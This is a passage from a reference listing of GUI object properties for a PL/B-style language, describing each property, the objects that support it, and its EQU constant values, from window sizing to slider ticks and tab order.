.$NONE EQU 0 // Same as $NOHATCH
$CROSS EQU 1
$DIAGCROSS EQU 2
$DOWNDIAG EQU 3
$HORZLINE EQU 4
$NOHATCH EQU 5 // Default
$CLEARHATCH EQU 6
$UPDIAG EQU 7
$VERTLINE EQU 8
.
*------------------------------------------------------------------------------
. FONT=svarslit|font object CREATE SETPROP GETPROP
.
. Description:
. This property specifies the font to be used for the supported
. objects.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. STATTEXT
. TABCONTROL
. WINDOW
.
. svarslit|font:
.
*------------------------------------------------------------------------------
. GROUPID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the group identifier for a radio button or
. checkbox object. All objects with the same group identifier are
. treated as one group for purposes of moving focus using the TAB or
. arrow keys. For radio buttons, this property is also used to
. determine which radio button to turn off when one is turned on.
.
. Objects:
. CHECKBOX
. RADIO
.
. dnumnvar values:
.
*------------------------------------------------------------------------------
. HEIGHT=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The height
. of the object can be retrieved using the GETPROP statement.
. The height is determined by subtracting the top object rectangle
. coordinate from the bottom object rectangle coordinate. The
. SETPROP statement can be used to change the current height of
. an object.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the height expects to use pixels.
.
*------------------------------------------------------------------------------
. HELPID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property is used in conjunction with a Windows Help file
. provided by the user. If a program is executing with the F1HELP
. set to ON using a SETMODE statement, then this HELPID value is
. used as the help index context value for finding a given subject
. in the help file when an object has the focus and the F1 function
. key is entered.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. HSCROLLBAR
. ICON
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. TABCONTROL
. VSCROLLBAR
.
. dnumnvar values:
.
. The <dnumnvar> value defines a help file context index value.
.
*------------------------------------------------------------------------------
. HWND=nvar GETPROP
.
. Description:
. This property is a GETPROP only property. The HWND property
. value is a Windows window handle for the supported object.
. This HWND value could be used in WINAPI functions where
. a window handle is required for the function.
.
. Objects:
. BUTTON
. CHECKBOX
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. HSCROLLBAR
. MOVIE
. POPUPMENU ( OBSELETE )
. RADIO
. SLIDER
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. nvar values:
.
. The <nvar> value retrieve is a Windows window handle for
. the supported object.
.
*------------------------------------------------------------------------------
. INTEGRAL=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies when a DATALIST is to resize for the
. number of items in a list versus leaving the size of the DATALIST
. to be as defined by the user rectangle coordinates. When the
. INTEGRAL property is set to OFF, then the size of the list box
. is the size specified by the user coordinate values. When the
. INTEGRAL property is set to ON, then the normal action of Windows
. is to resize a list box so that the list box does not display
. partial items.
.
. Objects:
. DATALIST
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. ITALIC[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the font should be italic. When
. the <dnumnvar> value is not provided, this indicates that the
. ITALIC property is turned on.
.
. Objects:
. FONT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. LEFT=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The LEFT
. property returns the left coordinate of a created objected.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. FLOATMENU
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used when
. the object was created.
.
*------------------------------------------------------------------------------
. LINKHSCROLL=<hscrollbar> CREATE GETPROP
.
. Description:
. This property is to allow a horizontal scrollbar object to be
. linked to the scrollbar which may be generated for a PICT or a
. WINDOW object. After the logical linkage is established, then
. operations on the linked scrollbar can be executed. This means
. that a GETITEM for the <hscrollbar> object can be executed to
. determine the current settings of the scrollbar which has be
. generated for another object.
.
. Note1: It is not possible to change the MIN, MAX, or SHIFT values
. for a picture linked scrollbar using either the SETPROP or
. SETITEM. A picture linked scrollbar can change the thumb
. position and tab id. These restrictions do not apply to
. a window linked scrollbar.
.
. Objects:
. PICT
. WINDOW
.
*------------------------------------------------------------------------------
. LINKVSCROLL=<vscrollbar> CREATE GETPROP
.
. Description:
. This property is to allow a vertical scrollbar object to be
. linked to the scrollbar which may be generated for a PICT or a
. WINDOW object. After the logical linkage is established, then
. operations on the linked scrollbar can be executed. This means
. that a GETITEM for the <vscrollbar> object can be executed to
. determine the current settings of the scrollbar which has be
. generated for another object.
.
. Note1: It is not possible to change the MIN, MAX, or SHIFT values
. for a linked scrollbar using either the SETPROP or SETITEM.
. It is possible to change the thumb position however.
.
. Objects:
. PICT
. WINDOW
.
*------------------------------------------------------------------------------
. LOWERCASE[=dnumnvar] CREATE
.
. Description:
. This property is a CREATE only property.
. The property specifies that the EDITTEXT object is to convert
. all entered data to lowercase. When this property is set to
. be OFF, then this indicates that no data conversion occurs.
.
. Note1: Use of the property should be replaced through use of
. the EDITTYPE property.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. MAX=dnumnvar See Objects:
.
. Description:
. This property defines the maximum value when the slider thumb is at
. the bottom or right most position of the supported object.
.
. Objects:
. HSCROLLBAR SETPROP GETPROP
. SLIDER CREATE SETPROP GETPROP
. VSCROLLBAR SETPROP GETPROP
.
. dnumnvar values:
.
. The value is a logical unit as specified by the user.
.
*------------------------------------------------------------------------------
. MAXBOX=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies when a MAXIMIZE box for the window
. object should be allowed or not.
.
. Note1: The MAXBOX property does not have an effect if the
. CAPTION property is set to $OFF for a MODAL or MODELESS
. window type.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. MAXCHARS=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. Specifies the maximum number of characters allowed to
. be entered into edittext object. This applies whether
. edittext is single line or multiline.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
. The <dnumnvar> value defines number of characters.
.
*------------------------------------------------------------------------------
. MAXCOLS=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The property is the maximum number of characters allowed for
. an individual line in a multiline edittext object. This property
. is ignored if the MULTILINE is not used.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
. The <dnumnvar> value defines number of characters.
.
*------------------------------------------------------------------------------
. MIN=dnumnvar See Objects:
.
. Description:
. This property defines the minimum value when the slider thumb is at
. the top or left most position of the supported object.
.
. Objects:
. HSCROLLBAR SETPROP GETPROP
. SLIDER CREATE SETPROP GETPROP
. VSCROLLBAR SETPROP GETPROP
.
. dnumnvar values:
.
. The value is a logical unit as specified by the user.
.
*------------------------------------------------------------------------------
. MINBOX=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies when a MINIMIZE box for the window
. object should be allowed or not.
.
. Note1: The MINBOX property does not have an effect if the
. CAPTION property is set to $OFF for a MODAL or MODELESS
. window type.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. MULTILINE[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property defines the number of lines to be allowed
. for an edittext object. If a user <dnumnvar> value
. is not specified, then the number of lines allowed is
. set to 32000. If the number of lines specified can
. fit into the user specified rectangle coordinates, then
. scrollbars are not provided. Otherwise, scrollbars will
. exist for the edittext object.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
. The <dnumnvar> value specifies number of lines.
.
*------------------------------------------------------------------------------
. MULTIROW=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property is used to indicate if labels are allowed to be
. shown in multiple rows. If multiple rows are not allowed, and
. the labels are too large to fit in one row, left and right
. arrow buttons are drawn to allow access to the other labels.
.
. Objects:
. TABCONTROL
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. MULTISELECT[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property allows a multiple items to be selected from a
. DATALIST. If the <dnumnvar> parameter is not provided, the
. MULTISELECT is set to ON.
.
. Objects:
. DATALIST
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. NOAUTOZOOM (OBSELETE) CREATE
.
. Description:
. This is an obselete property maintained only for backward
. source compatibility. The NOAUTOZOOM property is the same
. as AUTOZOOM=0.
.
. Note1: The AUTOZOOM property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NOINTEGRAL (OBSELETE) CREATE
.
. Description:
. This property is a CREATE only property and is obselete.
. This property maintained only for backward source compatibility.
. The NOINTEGRAL property is the same as INTEGRAL=0.
.
. Note1: The INTEGRAL property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. DATALIST
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NOPERCENT (OBSELETE) CREATE
.
. Description:
. This property is a CREATE only property and is obselete.
. This property maintained only for backward source compatibility.
. The NOPERCENT property is the same as PERCENT=0.
.
. Note1: The PERCENT property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. PROGRESS
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NORESIZE (OBSELETE) CREATE
.
. Description:
. This property is a CREATE only property and is obselete.
. This property maintained only for backward source compatibility.
. The NORESIZE property is the same as RESIZE=0.
.
. Note1: The RESIZE property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NOSCROLL (OBSELETE) CREATE
.
. Description:
. This property is a CREATE only property and is obselete.
. This property maintained only for backward source compatibility.
. The NOSCROLL property is the same as SCROLLBAR=0.
.
. Note1: The SCROLLBAR property must be used if SETPROP/GETPROP
. operations are required.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. None
.
*------------------------------------------------------------------------------
. NUMERIC[=dnumnvar] CREATE
.
. Description:
. This property is a CREATE only property.
. The property specifies that the EDITTEXT object is to allow
. numeric digits 0 through 9, '-' character, and '.' character.
. When this property is set to the OFF state, this indicates that
. all characters are allowed. If the <dnumnvar> value is not
. provided, the NUMERIC property is set to ON.
.
. Note1: Use of the property should be replaced through use of
. the EDITTYPE property.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 1 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. OBJECTID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies a identification number for an object.
. The OBJECTID value is available through the use of the EVENTINFO
. or EVENTREG statements to identify the object which caused
. an event to occur.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. FLOATMENU
. GROUPBOX
. HSCROLLBAR
. ICON
. LINE
. MENU
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SHAPE
. SLIDER
. STATTEXT
. SUBMENU
. TABCONTROL
. TIMER
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumvar> is a user specified number to identify an object.
.
*------------------------------------------------------------------------------
. ORIENTATION=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The property controls the whether a slider object is to be
. horizontal or vertical.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as $VERT
$HORZ EQU 1
$VERT EQU 2 // Default
.
*------------------------------------------------------------------------------
. PAGE=dnumnvar CREATE
.
. Description:
. This is a CREATE only property.
. This property specifies the page to be used for the pict object
. when a DCX picture is used.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. The <dnumnvar> specifies a page value.
.
*------------------------------------------------------------------------------
. PASSWORD[=dnumnvar] CREATE
.
. Description:
. This is a CREATE only property.
. This property specifies that the edittext is to have each
. character echoed as a '*' character. If the <dnumnvar> value
. is not specified, the PASSWORD property is set to ON.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. PERCENT=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies if a percentage value is to be displayed
. for the progress object or not.
.
. Objects:
. PROGRESS
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. PICTSIZEH=nvar GETPROP
.
. Description:
. This property is a GETPROP only property. This retrieves the
. horizontal size of a picture. The value is expressed in pixels.
.
. Objects:
. PICT
.
. nvar values:
.
. The <nvar> value retrieved is the horizontal pixel size of the picture.
.
*------------------------------------------------------------------------------
. PICTSIZEV=nvar GETPROP
.
. Description:
. This property is a GETPROP only property. This retrieves the
. vertical size of a picture. The value is expressed in pixels.
.
. Objects:
. PICT
.
. nvar values:
.
. The <nvar> value retrieved is the vertical pixel size of the picture.
.
*------------------------------------------------------------------------------
. POS=dnumnvarH:dnumnvarV SETPROP GETPROP
.
. Description:
. This property is a SETPROP/GETPROP only property.
. The POS property specifies the starting horizontal and vertical
. pixel coordinate in a pict object where the picture is to be
. displayed.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. The <dnumnvarH> value is the horizontal pixel coordinate in the pict.
. The <dnumnvarV> value is the vertical pixel coordinate in the pict.
.
*------------------------------------------------------------------------------
. PRINTER[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the datalist object is to be filled
. with the current Windows printer names. If the <dnumnvar> value
. is not provided, the PRINTER property is set to ON.
.
. Objects:
. DATALIST
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. READONLY[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the edittext object is a read only
. object. The user can place the caret into the edittext object
. to cut/copy data, however, the current edittext data can not
. be changed by the user. If the <dnumnvar> value is not specified,
. the READONLY property is turned on.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. RESIZE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies if a picture is to be resized to fit
. pict object rectangle coordinates.
.
. Objects:
. PICT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. RESOURCE=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a SETPROP/GETPROP only property.
. The RESOURCE property allows a resource id to be retreived/changed
. for supported objects.
.
. Objects:
. ICON
. PICT
.
. dnumnvar values:
.
. The <dnumnvar> value is valid resource id which can be found
. in a resource DLL or resources loaded for a PLFORM.
.
*------------------------------------------------------------------------------
. RIGHT[=dnumnvar] CREATE
.
. Description:
. The RIGHT property specifies that the text is to be right justified
. horizontally for the object. The property is replaced by
. the ALIGNMENT property. The ALIGNMENT property is to be used
. for performing SETPROP and GETPROP operations.
.
. If the syntax form is used where the <dnumnvar> value is not
. specified, this indicates that the RIGHT property is to be
. turned on.
.
. Also note that if the RIGHT property is turned off, this causes
. the text output to be justified to the left.
.
. Objects:
. EDITTEXT
. STATTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. RIGHTBUTTON[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies whether the right mouse button can be
. used to cause an event or not. If the <dnumnvar> value
. is not provided, the RIGHTBUTTON property is turned on.
.
. Objects:
. FLOATMENU
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. SCALE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies a percentage by which a picture object
. is scaled.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. The <dnumnvar> value is percentage value.
.
*------------------------------------------------------------------------------
. SCROLLBAR[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies what type of scrollbars are to be provided
. for a picture or window object. If the <dnumnvar> value
. is not provided, the SCROLLBAR property is set to $SCRBOTH.
.
. Objects:
. PICT
. WINDOW
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
$SCRBOTH EQU 1
$SCRHORZ EQU 2
$SCRNONE EQU 3
$SCRVERT EQU 4
.
*------------------------------------------------------------------------------
. SELLENGTH=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the number of units to highlight in
. the slider object view when the SELRANGE property is set to ON.
. It is recommended that the SELLENGTH value be defined in the
. range specified by the MAX and MIN property values.
.
. Note1: The highlighted output does not occur when the SELLENGTH
. property value plus the SELSTART value is greater than
. 32767. The highlighted output may not occur if 'nvar'
. value is negative.
.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
. The <dnumnvar> value is logical user specified units.
.
*------------------------------------------------------------------------------
. SELRANGE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The property specifies if a highlighted selection is to be
. applied to the slider object. When this PROPERTY it turned
. ON, the slider object uses the SELSTART and SELLENGTH
. values to define the highlighted selection output.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. SELSTART=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the starting logical unit from which
. the slider object begins the highlighed output when the SELRANGE
. property is set to ON.
.
. Note1: The highlighted output does not occur when the SELLENGTH
. property value plus the SELSTART value is greater than
. 32767. The highlighted output may not occur if 'nvar'
. value is negative.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
. The <dnumnvar> value is logical user specified unit.
.
*------------------------------------------------------------------------------
. SHAPE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the type of shape to be output for the
. shape object. If the SHAPE property is invalid, the shape
. object defaults to a rectangle output.
.
. Objects:
. SHAPE
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as $RECTANGLE
$OVAL EQU 1
$RECTANGLE EQU 2 // Default
$RNDRECT EQU 3
.
*------------------------------------------------------------------------------
. SHIFT=dnumnvar See Objects:
.
. Description:
. This property defines the number of units to move the slider
. thumb when the mouse is clicked in the object slide area.
. This also occurs when the page up or page down keys are entered.
.
. Objects:
. HSCROLLBAR SETPROP GETPROP
. SLIDER CREATE SETPROP GETPROP
. VSCROLLBAR SETPROP GETPROP
.
. dnumnvar values:
.
. The value is a logical unit as specified by the user.
.
*------------------------------------------------------------------------------
. SIZE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the point size for a font object.
.
. Objects:
. FONT
.
. dnumnvar values:
.
. The <dnumnvar> value is a point size for a font.
.
*------------------------------------------------------------------------------
. SORTED[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the items in the datalist object
. are to be sorted. If the <dnumnvar> value is not provided,
. the SORTED property is turned ON.
.
. Note1: When the SORTED property is used, Windows controls the
. sorting method. The Windows method is to sort the
. item name field alphabetically starting with the first
. character. Windows does not support any alternate sorting
. methods.
.
. Objects:
. COMBOBOX
. DATALIST
. POPUPMENU ( OBSELETE )
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. STATIC[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the edittext object is used for
. output only purposes. An edittext object with this property
. can not get the focus and not cut/copy operations can be perform.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. STYLE=dnumnvar|3DON|3DOFF|3DFLAT|3DOUT CREATE SETPROP GETPROP
.
. Description:
. The STYLE property specifies when an object should
. have a 3D look or a non-3D look. The various forms of STYLE
. defines that an object can have presentations as follows:
.
. 3DOFF - Object does not have a 3D look.
. 3DON - Ojbect has a 3D sunken look.
. 3DFLAT- Object has a 3D flat look.
. 3DOUT - Object has a 3D outward look.
.
. Note1: Some objects are limited to presentations described as
. 3DON or 3DOFF only. For these objects the user should
. use the APPEARANCE property and not the STYLE property.
.
. Objects:
. CHECKBOX (See Note1:)
. CHECKGRP (See Note1:)
. COMBOBOX (See Note1:)
. DATALIST (See Note1:)
. EDITTEXT
. GROUPBOX
. MOVIE
. PICT
. POPUPMENU ( OBSELETE ) (See Note1:)
. PROGRESS
. RADIOGRP (See Note1:)
. RADIO (See Note1:)
. STATTEXT
. WINDOW (See Note1:)
.
. dnumnvar values:
.
$DEFAULT EQU 0 // Default
$3DON EQU 1
$3DOFF EQU 2
$3DFLAT EQU 3
$3DOUT EQU 4
.
*------------------------------------------------------------------------------
. SYSMENU=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies whether a window object should output
. a sysmenu or not.
.
. Note1: The SYSMENU property does not have an effect if the
. CAPTION property is set to $OFF for a MODAL or MODELESS
. window type.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. TABFIXHTH=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the height in pixels for the
. TABCONTROL labels. This property only takes affect when the
. TABWTHSTYLE property is set to FIXED.
.
. Objects:
. TABCONTROL
.
. dnumnvar values:
.
. The <dnumnvar> value is the number of pixels for label height.
.
*------------------------------------------------------------------------------
. TABFIXWTH=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the width in pixels for the
. TABCONTROL labels. This property only takes affect when the
. TABWTHSTYLE property is set to FIXED.
.
. Objects:
. TABCONTROL
.
. dnumnvar values:
.
. The <dnumnvar> value is the number of pixels for label width.
.
*------------------------------------------------------------------------------
. TABID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the location of this object in the
. tabbing order sequence. If the TABID property is not used, the
. object is assigned an internal tabbing order value which is
. determined by the order that objects are created and an
. intial TABID value specified for the window of the object. If the
. TABID property id is specified, then the value of the TABID
. determines the location of the object in the tabbing sequence.
. The tabbing sequence processes from lower TABID valued objects
. to higher TABID valued objects as the TAB key is entered.
.
. Note1: The *NODEFTABID=OFF in the SETMODE statement can be
. used to exclude any object with an internally assigned
. tabid from the tabbing sequence.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. HSCROLLBAR
. POPUPMENU ( OBSELETE )
. RADIOGRP
. RADIO
. SLIDER
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is a user specified value to tabbing order.
.
*------------------------------------------------------------------------------
. TABLABEL=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property provides the data items used to generate the
. TABCONTROL labels. The data provided in the <svarslit> is
. set of items separated by semicolon characters. If the TABLABEL
. is not specified or the <svarslit> is NULL, then the TABCONTROL
. will not have any tab labels.
.
. Objects:
. TABCONTROL
.
. svarslit values:
.
. The <svarslit> is a list of items separated by a semicolon.
.
*------------------------------------------------------------------------------
. TABSTOPS=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property specifies a data string which is composed of tabstop
. location values separated by semicolon characters. See the manual
. for detailed description.
.
. Objects:
. DATALIST
.
. svarslit values:
.
. The <svarslit> data string is tabstop location values separated
. by semicolons.
.
*------------------------------------------------------------------------------
. TABWTHSTYLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the look of the labels. If the $FIXED
. value is used, the TABFIXHTH and TABFIXWTH properties determine
. the height and width of the labels. The $JUST value causes any
. multiple row TABCONTROL to size the labels evenly to fill each row.
.
. Objects:
. TABCONTROL
.
. dnumnvar values:
.
.$NONE EQU 0
$FIXED EQU 1
$JUST EQU 2
$NOJUST EQU 3
.
*------------------------------------------------------------------------------
. TICKFREQ=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the frequency at which tick marks are
. applied to the slider object output. The <dnumnvar> value for
. this property should be in the range of the MIN and MAX values.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
. The <dnumnvar> is a user logical unit value.
.
*------------------------------------------------------------------------------
. TICKSTYLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the type of look that a slider object
. takes on. This property causes tick unit marks
. to be placed on either side of the slide thumb control;
. on both sides of the slide thumb control; or no tick
. mark output at all. The number of tick units to be applied
. depend on the MAX, MIN, and TICKFREQ property values.
.
. Note1: Values other than those shown for <dnumnvar> result in
. no tick mark output.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
.$NONE EQU 0
$TICKBOTH EQU 1
$TICKBOTTOM EQU 2
$TICKRIGHT EQU 2
$TICKTOP EQU 4
$TICKLEFT EQU 4
.
*------------------------------------------------------------------------------
. TITLE=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property allows a title to be specified for the supported
. objects.
.
. Objects:
. CHECKGRP
. GROUPBOX
. RADIOGRP
. WINDOW
.
. svarslit values:
.
. The <svarslit> variable is a title string.
.
*------------------------------------------------------------------------------
. TOP=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a SETPROP/GETPROP only property. The property
. is the current top coordinate for an object.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. FLOATMENU
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used when
. the object was created.
.
*------------------------------------------------------------------------------
. TRISTATE[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that a checkbox object is to have the
. capability of a third state or not. When the TRISTATE property
. is turned ON, this allows the checkbox object to be checked
. and grayed as a third state. When the TRISATE property is turned
. OFF, the checkbox object only has two states where the checkbox
. is either blanked or checked.
.
. Note1: Under program control the SETITEM statement can be used
. to set the current state of the checkbox object.
.
. Objects:
. CHECKBOX
. CHECKGRP
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. UPPERCASE[=dnumnvar] CREATE
.
. Description:
. This property is a CREATE only property.
. This property specifies that the edittext object is to convert
. all entered data to uppercase. When this property is set to
. be OFF, then this indicates that no data conversion occurs.
.
. Note1: Use of the property should be replaced by using the EDITTYPE
. property.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. USEALTKEY=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies if the Windows ALT+KEY is to be allowed
. for the stattext object. If the USEALTKEY property is set to ON,
. then using an '&' character in the name of the stattext object
. will allow the ALT+KEY feature to work. If the USEALTKEY property
. is set to OFF, then any '&' character in the name of the
. stattext object is output as part of the name and the ALT+KEY
. feature does not generate any events for the object.
.
. Objects:
. STATTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. VISIBLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies if an object is to be made visible or
. invisible. If the VISIBLE property is set to $ON and the current
. state of the object is invisible, then this is the same as if
. if an ACTIVATE statement without any activation routine was
. executed for the object. However, if the VISIBLE property is set
. $ON and the object is already visible, then the object remains
. visible and no change occurs. If the VISIBLE property is set to
. $OFF, this is the same as if a DEACTIVATE statement was executed
. for the object. The GETPROP retrieves the current VISIBLE state
. for the object.
.
. Note1: The VISIBLE property is ignored for a WINDOW object when
. the WINTYPE is set for MODAL. This can not be allowed
. since the program execution remains at the ACTIVATE
. statement while the MODAL dialog is processed. If the
. VISIBLE property were allowed, then this would cause
. program execution to remain at the CREATE statement
. causing a program to hang since no events could be
. registered for use.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MOVIE
. PICT
. POPUPMENU
. PROGRESS
. RADIO
. RADIOGRP
. SHAPE
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. WIDTH=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The width
. of the object can be retrieved using the GETPROP statement.
. The width is determined by subtracting the left object rectangle
. coordinate from the right object rectangle coordinate. The
. SETPROP statement can be used to change the current width of
. an object.
.
